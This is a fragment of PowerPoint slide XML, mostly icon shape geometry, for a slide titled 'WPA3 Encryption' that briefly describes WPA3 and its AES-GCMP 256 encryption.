                <a:gd name="T56" fmla="*/ 24003 w 50"/>
                <a:gd name="T57" fmla="*/ 123444 h 50"/>
                <a:gd name="T58" fmla="*/ 44577 w 50"/>
                <a:gd name="T59" fmla="*/ 147447 h 50"/>
                <a:gd name="T60" fmla="*/ 24003 w 50"/>
                <a:gd name="T61" fmla="*/ 171450 h 5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0" h="50">
                  <a:moveTo>
                    <a:pt x="49" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="50"/>
                    <a:pt x="48" y="50"/>
                    <a:pt x="48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1" y="50"/>
                    <a:pt x="40" y="49"/>
                    <a:pt x="40" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="27"/>
                    <a:pt x="23" y="11"/>
                    <a:pt x="2" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="9"/>
                    <a:pt x="0" y="8"/>
                    <a:pt x="0" y="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" y="1"/>
                    <a:pt x="26" y="6"/>
                    <a:pt x="35" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="24"/>
                    <a:pt x="49" y="35"/>
                    <a:pt x="50" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="48"/>
                    <a:pt x="50" y="49"/>
                    <a:pt x="49" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="31" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="50"/>
                    <a:pt x="30" y="50"/>
                    <a:pt x="29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3" y="50"/>
                    <a:pt x="23" y="49"/>
                    <a:pt x="22" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="37"/>
                    <a:pt x="13" y="29"/>
                    <a:pt x="2" y="28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19"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="18"/>
                    <a:pt x="1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0" y="19"/>
                    <a:pt x="17" y="22"/>
                    <a:pt x="22" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="33"/>
                    <a:pt x="31" y="40"/>
                    <a:pt x="32" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="48"/>
                    <a:pt x="32" y="49"/>
                    <a:pt x="31" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="50"/>
                    <a:pt x="0" y="47"/>
                    <a:pt x="0" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="40"/>
                    <a:pt x="3" y="36"/>
                    <a:pt x="7" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="36"/>
                    <a:pt x="13" y="40"/>
                    <a:pt x="13" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="47"/>
                    <a:pt x="10" y="50"/>
                    <a:pt x="7" y="5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2439C695-8E3B-44CF-8069-17757E246696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4787670" y="3714722"/>
            <a:ext cx="558806" cy="558806"/>
            <a:chOff x="4787670" y="3719080"/>
            <a:chExt cx="558806" cy="558806"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Oval 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4787670" y="3719080"/>
              <a:ext cx="558806" cy="558806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx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8" name="Freeform 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8BA1EA-EA80-456F-B96D-CE6A332A9E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5063" y="3829606"/>
              <a:ext cx="265244" cy="347998"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 141288 w 41"/>
                <a:gd name="T1" fmla="*/ 160929 h 51"/>
                <a:gd name="T2" fmla="*/ 127504 w 41"/>
                <a:gd name="T3" fmla="*/ 174625 h 51"/>
                <a:gd name="T4" fmla="*/ 10338 w 41"/>
                <a:gd name="T5" fmla="*/ 174625 h 51"/>
                <a:gd name="T6" fmla="*/ 0 w 41"/>
                <a:gd name="T7" fmla="*/ 160929 h 51"/>
                <a:gd name="T8" fmla="*/ 0 w 41"/>
                <a:gd name="T9" fmla="*/ 92449 h 51"/>
                <a:gd name="T10" fmla="*/ 10338 w 41"/>
                <a:gd name="T11" fmla="*/ 78752 h 51"/>
                <a:gd name="T12" fmla="*/ 13784 w 41"/>
                <a:gd name="T13" fmla="*/ 78752 h 51"/>
                <a:gd name="T14" fmla="*/ 13784 w 41"/>
                <a:gd name="T15" fmla="*/ 54784 h 51"/>
                <a:gd name="T16" fmla="*/ 68921 w 41"/>
                <a:gd name="T17" fmla="*/ 0 h 51"/>
                <a:gd name="T18" fmla="*/ 124058 w 41"/>
                <a:gd name="T19" fmla="*/ 54784 h 51"/>
                <a:gd name="T20" fmla="*/ 124058 w 41"/>
                <a:gd name="T21" fmla="*/ 78752 h 51"/>
                <a:gd name="T22" fmla="*/ 127504 w 41"/>
                <a:gd name="T23" fmla="*/ 78752 h 51"/>
                <a:gd name="T24" fmla="*/ 141288 w 41"/>
                <a:gd name="T25" fmla="*/ 92449 h 51"/>
                <a:gd name="T26" fmla="*/ 141288 w 41"/>
                <a:gd name="T27" fmla="*/ 160929 h 51"/>
                <a:gd name="T28" fmla="*/ 99935 w 41"/>
                <a:gd name="T29" fmla="*/ 78752 h 51"/>
                <a:gd name="T30" fmla="*/ 99935 w 41"/>
                <a:gd name="T31" fmla="*/ 54784 h 51"/>
                <a:gd name="T32" fmla="*/ 68921 w 41"/>
                <a:gd name="T33" fmla="*/ 23968 h 51"/>
                <a:gd name="T34" fmla="*/ 37907 w 41"/>
                <a:gd name="T35" fmla="*/ 54784 h 51"/>
                <a:gd name="T36" fmla="*/ 37907 w 41"/>
                <a:gd name="T37" fmla="*/ 78752 h 51"/>
                <a:gd name="T38" fmla="*/ 99935 w 41"/>
                <a:gd name="T39" fmla="*/ 78752 h 5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1" h="51">
                  <a:moveTo>
                    <a:pt x="41" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="49"/>
                    <a:pt x="39" y="51"/>
                    <a:pt x="37" y="51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1" y="51"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="4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5"/>
                    <a:pt x="1" y="23"/>
                    <a:pt x="3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8"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="20" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="0"/>
                    <a:pt x="36" y="8"/>
                    <a:pt x="36" y="16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9" y="23"/>
                    <a:pt x="41" y="25"/>
                    <a:pt x="41" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="41" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="29" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="16"/>
                    <a:pt x="29" y="16"/>
                    <a:pt x="29" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="11"/>
                    <a:pt x="25" y="7"/>
                    <a:pt x="20" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="7"/>
                    <a:pt x="11" y="11"/>
                    <a:pt x="11" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="23"/>
                    <a:pt x="11" y="23"/>
                    <a:pt x="11" y="23"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="2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DEB66D1-4292-45A1-916F-FE96C27E498C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="158692" y="1609317"/>
            <a:ext cx="914400" cy="914400"/>
            <a:chOff x="158692" y="1521843"/>
            <a:chExt cx="914400" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED3000E-0A2F-4670-8E74-CE1924E715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8692" y="1521843"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 512 w 1024"/>
                <a:gd name="T1" fmla="*/ 0 h 1024"/>
                <a:gd name="T2" fmla="*/ 0 w 1024"/>
                <a:gd name="T3" fmla="*/ 512 h 1024"/>
                <a:gd name="T4" fmla="*/ 512 w 1024"/>
                <a:gd name="T5" fmla="*/ 1024 h 1024"/>
                <a:gd name="T6" fmla="*/ 1024 w 1024"/>
                <a:gd name="T7" fmla="*/ 512 h 1024"/>
                <a:gd name="T8" fmla="*/ 512 w 1024"/>
                <a:gd name="T9" fmla="*/ 0 h 1024"/>
                <a:gd name="T10" fmla="*/ 512 w 1024"/>
                <a:gd name="T11" fmla="*/ 951 h 1024"/>
                <a:gd name="T12" fmla="*/ 73 w 1024"/>
                <a:gd name="T13" fmla="*/ 512 h 1024"/>
                <a:gd name="T14" fmla="*/ 512 w 1024"/>
                <a:gd name="T15" fmla="*/ 73 h 1024"/>
                <a:gd name="T16" fmla="*/ 951 w 1024"/>
                <a:gd name="T17" fmla="*/ 512 h 1024"/>
                <a:gd name="T18" fmla="*/ 512 w 1024"/>
                <a:gd name="T19" fmla="*/ 951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1024">
                  <a:moveTo>
                    <a:pt x="512" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="0"/>
                    <a:pt x="0" y="229"/>
                    <a:pt x="0" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="795"/>
                    <a:pt x="229" y="1024"/>
                    <a:pt x="512" y="1024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="795" y="1024"/>
                    <a:pt x="1024" y="795"/>
                    <a:pt x="1024" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1024" y="229"/>
                    <a:pt x="795" y="0"/>
                    <a:pt x="512" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="512" y="951"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="270" y="951"/>
                    <a:pt x="73" y="754"/>
                    <a:pt x="73" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="270"/>
                    <a:pt x="270" y="73"/>
                    <a:pt x="512" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="754" y="73"/>
                    <a:pt x="951" y="270"/>
                    <a:pt x="951" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="951" y="754"/>
                    <a:pt x="754" y="951"/>
                    <a:pt x="512" y="9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82843" tIns="91422" rIns="182843" bIns="91422" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="id-ID">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Freeform 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EEE0E4A-A597-4E77-823B-754EB0A81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84" y="1837665"/>
              <a:ext cx="70921" cy="70612"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168 w 193"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 24 w 193"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 0 w 193"/>
                <a:gd name="T5" fmla="*/ 24 h 192"/>
                <a:gd name="T6" fmla="*/ 0 w 193"/>
                <a:gd name="T7" fmla="*/ 168 h 192"/>
                <a:gd name="T8" fmla="*/ 24 w 193"/>
                <a:gd name="T9" fmla="*/ 192 h 192"/>
                <a:gd name="T10" fmla="*/ 168 w 193"/>
                <a:gd name="T11" fmla="*/ 192 h 192"/>
                <a:gd name="T12" fmla="*/ 193 w 193"/>
                <a:gd name="T13" fmla="*/ 168 h 192"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 24 h 192"/>
                <a:gd name="T16" fmla="*/ 168 w 193"/>
                <a:gd name="T1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3" h="192">
                  <a:moveTo>
                    <a:pt x="168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82"/>
                    <a:pt x="11" y="192"/>
                    <a:pt x="24" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="192"/>
                    <a:pt x="168" y="192"/>
                    <a:pt x="168" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="192"/>
                    <a:pt x="193" y="182"/>
                    <a:pt x="193" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="24"/>
                    <a:pt x="193" y="24"/>
                    <a:pt x="193" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="11"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="16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id-ID">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Freeform 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F7291B-A728-49BA-89F1-A7A52EC95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84" y="1943892"/>
              <a:ext cx="70921" cy="70457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168 w 193"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 24 w 193"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 0 w 193"/>
                <a:gd name="T5" fmla="*/ 24 h 192"/>
                <a:gd name="T6" fmla="*/ 0 w 193"/>
                <a:gd name="T7" fmla="*/ 168 h 192"/>
                <a:gd name="T8" fmla="*/ 24 w 193"/>
                <a:gd name="T9" fmla="*/ 192 h 192"/>
                <a:gd name="T10" fmla="*/ 168 w 193"/>
                <a:gd name="T11" fmla="*/ 192 h 192"/>
                <a:gd name="T12" fmla="*/ 193 w 193"/>
                <a:gd name="T13" fmla="*/ 168 h 192"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 24 h 192"/>
                <a:gd name="T16" fmla="*/ 168 w 193"/>
                <a:gd name="T1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3" h="192">
                  <a:moveTo>
                    <a:pt x="168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81"/>
                    <a:pt x="11" y="192"/>
                    <a:pt x="24" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="192"/>
                    <a:pt x="168" y="192"/>
                    <a:pt x="168" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="192"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="24"/>
                    <a:pt x="193" y="24"/>
                    <a:pt x="193" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="11"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="16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id-ID">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Freeform 162">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468C4334-3FA7-4BB1-95DC-BE15626BD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84" y="2049655"/>
              <a:ext cx="70921" cy="70766"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168 w 193"/>
                <a:gd name="T1" fmla="*/ 0 h 193"/>
                <a:gd name="T2" fmla="*/ 24 w 193"/>
                <a:gd name="T3" fmla="*/ 0 h 193"/>
                <a:gd name="T4" fmla="*/ 0 w 193"/>
                <a:gd name="T5" fmla="*/ 25 h 193"/>
                <a:gd name="T6" fmla="*/ 0 w 193"/>
                <a:gd name="T7" fmla="*/ 169 h 193"/>
                <a:gd name="T8" fmla="*/ 24 w 193"/>
                <a:gd name="T9" fmla="*/ 193 h 193"/>
                <a:gd name="T10" fmla="*/ 168 w 193"/>
                <a:gd name="T11" fmla="*/ 193 h 193"/>
                <a:gd name="T12" fmla="*/ 193 w 193"/>
                <a:gd name="T13" fmla="*/ 169 h 193"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 25 h 193"/>
                <a:gd name="T16" fmla="*/ 168 w 193"/>
                <a:gd name="T1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3" h="193">
                  <a:moveTo>
                    <a:pt x="168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82"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="24" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="193"/>
                    <a:pt x="168" y="193"/>
                    <a:pt x="168" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="193"/>
                    <a:pt x="193" y="182"/>
                    <a:pt x="193" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="25"/>
                    <a:pt x="193" y="25"/>
                    <a:pt x="193" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="11"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="16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id-ID">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ADE157-FBF5-4FEF-8E00-FE2295A7F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311" y="1837665"/>
              <a:ext cx="176529" cy="70612"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 457 w 481"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 24 w 481"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 0 w 481"/>
                <a:gd name="T5" fmla="*/ 24 h 192"/>
                <a:gd name="T6" fmla="*/ 0 w 481"/>
                <a:gd name="T7" fmla="*/ 168 h 192"/>
                <a:gd name="T8" fmla="*/ 24 w 481"/>
                <a:gd name="T9" fmla="*/ 192 h 192"/>
                <a:gd name="T10" fmla="*/ 457 w 481"/>
                <a:gd name="T11" fmla="*/ 192 h 192"/>
                <a:gd name="T12" fmla="*/ 481 w 481"/>
                <a:gd name="T13" fmla="*/ 168 h 192"/>
                <a:gd name="T14" fmla="*/ 481 w 481"/>
                <a:gd name="T15" fmla="*/ 24 h 192"/>
                <a:gd name="T16" fmla="*/ 457 w 481"/>
                <a:gd name="T1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1" h="192">
                  <a:moveTo>
                    <a:pt x="457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82"/>
                    <a:pt x="11" y="192"/>
                    <a:pt x="24" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="192"/>
                    <a:pt x="457" y="192"/>
                    <a:pt x="457" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="192"/>
                    <a:pt x="481" y="182"/>
                    <a:pt x="481" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="24"/>
                    <a:pt x="481" y="24"/>
                    <a:pt x="481" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="11"/>
                    <a:pt x="470" y="0"/>
                    <a:pt x="45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id-ID">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{423E6059-211E-4061-9EEB-96FD77785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311" y="1943892"/>
              <a:ext cx="176529" cy="70457"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 457 w 481"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 24 w 481"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 0 w 481"/>
                <a:gd name="T5" fmla="*/ 24 h 192"/>
                <a:gd name="T6" fmla="*/ 0 w 481"/>
                <a:gd name="T7" fmla="*/ 168 h 192"/>
                <a:gd name="T8" fmla="*/ 24 w 481"/>
                <a:gd name="T9" fmla="*/ 192 h 192"/>
                <a:gd name="T10" fmla="*/ 457 w 481"/>
                <a:gd name="T11" fmla="*/ 192 h 192"/>
                <a:gd name="T12" fmla="*/ 481 w 481"/>
                <a:gd name="T13" fmla="*/ 168 h 192"/>
                <a:gd name="T14" fmla="*/ 481 w 481"/>
                <a:gd name="T15" fmla="*/ 24 h 192"/>
                <a:gd name="T16" fmla="*/ 457 w 481"/>
                <a:gd name="T1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1" h="192">
                  <a:moveTo>
                    <a:pt x="457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81"/>
                    <a:pt x="11" y="192"/>
                    <a:pt x="24" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="192"/>
                    <a:pt x="457" y="192"/>
                    <a:pt x="457" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="192"/>
                    <a:pt x="481" y="181"/>
                    <a:pt x="481" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="24"/>
                    <a:pt x="481" y="24"/>
                    <a:pt x="481" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="11"/>
                    <a:pt x="470" y="0"/>
                    <a:pt x="45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id-ID" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC4237D-91B4-47D1-B95E-CE77D915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311" y="2049655"/>
              <a:ext cx="176529" cy="70766"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 457 w 481"/>
                <a:gd name="T1" fmla="*/ 0 h 193"/>
                <a:gd name="T2" fmla="*/ 24 w 481"/>
                <a:gd name="T3" fmla="*/ 0 h 193"/>
                <a:gd name="T4" fmla="*/ 0 w 481"/>
                <a:gd name="T5" fmla="*/ 25 h 193"/>
                <a:gd name="T6" fmla="*/ 0 w 481"/>
                <a:gd name="T7" fmla="*/ 169 h 193"/>
                <a:gd name="T8" fmla="*/ 24 w 481"/>
                <a:gd name="T9" fmla="*/ 193 h 193"/>
                <a:gd name="T10" fmla="*/ 457 w 481"/>
                <a:gd name="T11" fmla="*/ 193 h 193"/>
                <a:gd name="T12" fmla="*/ 481 w 481"/>
                <a:gd name="T13" fmla="*/ 169 h 193"/>
                <a:gd name="T14" fmla="*/ 481 w 481"/>
                <a:gd name="T15" fmla="*/ 25 h 193"/>
                <a:gd name="T16" fmla="*/ 457 w 481"/>
                <a:gd name="T1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1" h="193">
                  <a:moveTo>
                    <a:pt x="457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82"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="24" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="193"/>
                    <a:pt x="457" y="193"/>
                    <a:pt x="457" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="193"/>
                    <a:pt x="481" y="182"/>
                    <a:pt x="481" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="25"/>
                    <a:pt x="481" y="25"/>
                    <a:pt x="481" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="481" y="11"/>
                    <a:pt x="470" y="0"/>
                    <a:pt x="45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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="id-ID">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25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8962449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Placeholder 6" descr="Graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA3827F6-32E1-4ABD-8AE9-4B5CEA33782B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156" r="23156"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6844090" y="0"/>
            <a:ext cx="5348287" cy="6568698"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57150" y="218676"/>
            <a:ext cx="6745485" cy="7109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WPA3 Encryption</a:t>
            </a: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6BED0C40-10BF-46BC-9938-4E43FEB663D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118356" y="1236472"/>
            <a:ext cx="5831084" cy="1015663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</a:rPr>
              <a:t>WPA3 is an </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN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</a:rPr>
              <a:t>advanced implementation of WPA2 providing trailblazing protocols and uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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-윤고딕140" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AES-GCMP 256 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IN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</a:rPr>
              <a:t>encryption algorithm</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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alibri"/>
              <a:ea typeface="-윤고딕140" pitchFamily="18" charset="-127"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/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718EFA82-EDC3-4331-A4B8-BA097FF693CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3306372" y="2588684"/>
            <a:ext cx="2930610" cy="430887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Modes of Operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E79FADA-A81F-4FD0-B7B0-DF139DCE59A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
